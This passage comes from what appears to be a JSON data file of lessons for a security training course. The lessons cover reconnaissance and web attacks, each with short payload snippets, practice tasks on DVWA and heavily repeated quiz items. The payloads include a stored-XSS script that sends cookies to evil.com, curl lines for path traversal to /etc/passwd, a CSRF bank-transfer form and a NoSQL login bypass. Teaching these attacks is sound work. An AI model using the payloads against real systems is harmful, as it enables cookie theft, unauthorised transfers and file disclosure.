ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-full-assessment","cat":"Reconnaissance","title":"Full External Assessment","diff":5,"xp":300,"intro":"Complete external assessment from company name to attack plan.","sections":[{"type":"text","content":"Start with nothing but a name. Map everything. Build a prioritized attack plan."},{"type":"code","lang":"bash","content":"# Phase 1: Passive OSINT (days)\n# Phase 2: Semi-passive DNS/certs (day)\n# Phase 3: Active scanning (days)\n# Phase 4: Correlate and prioritize"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"A full assessment starts with...","opts":["Running Metasploit","Just a company name","Internal network access","A vuln scan"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"w-sqli-error","cat":"Web Application","title":"Error-Based SQLi","diff":1,"xp":100,"intro":"Extract data through error messages.","sections":[{"type":"text","content":"Database errors contain data when queries are crafted to cause informative failures."},{"type":"code","lang":"bash","content":"?id=1 AND 1=CAST((SELECT version()) AS int)\n?id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Error-based SQLi works when...","opts":["Errors are hidden","The app shows detailed database errors","The DB is encrypted","NoSQL is used"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-xss-reflected","cat":"Web Application","title":"Reflected XSS Techniques","diff":1,"xp":75,"intro":"Your input is reflected in the page \u2014 inject scripts.","sections":[{"type":"text","content":"Reflected XSS: the payload is in the URL and reflected in the response without sanitization."},{"type":"code","lang":"bash","content":"?search=<script>alert(1)</script>\n?name=<img src=x onerror=alert(1)>\n?q=<svg/onload=alert(document.cookie)>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Reflected XSS payload is delivered via...","opts":["Database","The URL (reflected in the response)","File upload","Email"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-xss-stored","cat":"Web Application","title":"Stored XSS Exploitation","diff":2,"xp":150,"intro":"Your payload is saved and shown to other users.","sections":[{"type":"text","content":"Stored XSS persists in the database \u2014 every user who views the page executes your script."},{"type":"code","lang":"bash","content":"# Inject in a comment/profile field:\n<script>fetch('https://evil.com/steal?c='+document.cookie)</script>\n# Every user who views the page sends their cookies"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Stored XSS is more dangerous than reflected because...","opts":["It's faster","It persists and affects every user who views the page","It uses SQL","It bypasses HTTPS"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-dir-traversal","cat":"Web Application","title":"Directory Traversal","diff":1,"xp":75,"intro":"Read files outside the web root using ../","sections":[{"type":"text","content":"Path traversal: ../../etc/passwd reads system files through the web app."},{"type":"code","lang":"bash","content":"curl 'http://target.com/file?path=../../../../etc/passwd'\ncurl 'http://target.com/download?f=......windowssystem32configsam'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences to escape the web root","XSS","CSRF"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-csrf-basic","cat":"Web Application","title":"CSRF Basics","diff":1,"xp":75,"intro":"Force victims to make unintended requests.","sections":[{"type":"text","content":"CSRF: the victim's browser sends an authenticated request to a target site without their knowledge."},{"type":"code","lang":"html","content":"<form action='https://bank.com/transfer' method='POST'>\n<input name='to' value='attacker'>\n<input name='amount' value='10000'>\n</form>\n<script>document.forms[0].submit();</script>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CSRF works because the browser...","opts":["Encrypts requests","Automatically sends cookies with every request to a domain","Blocks cross-origin","Validates tokens"],"ans":1},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-header-injection","cat":"Web Application","title":"HTTP Header Injection","diff":2,"xp":150,"intro":"Inject CRLF to add headers or split responses.","sections":[{"type":"text","content":"Unsanitized CRLF (\\r\\n) in headers lets you inject new headers or response bodies."},{"type":"code","lang":"bash","content":"?redirect=http://target.com%0d%0aSet-Cookie:admin=true"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CRLF injection exploits...","opts":["SQL queries","Unsanitized newline characters in HTTP headers","JavaScript","File uploads"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-nosql","cat":"Web Application","title":"NoSQL Injection","diff":2,"xp":150,"intro":"MongoDB operator injection.","sections":[{"type":"text","content":"JSON operators like $ne, $gt, $regex bypass auth and extract data."},{"type":"code","lang":"bash","content":"POST /login\n{\"username\":{\"$ne\":\"\"},\"password\":{\"$ne\":\"\"}}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"NoSQL injection uses...","opts":["SQL keywords","MongoDB operators like $ne, $regex","HTML tags","CSS"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site 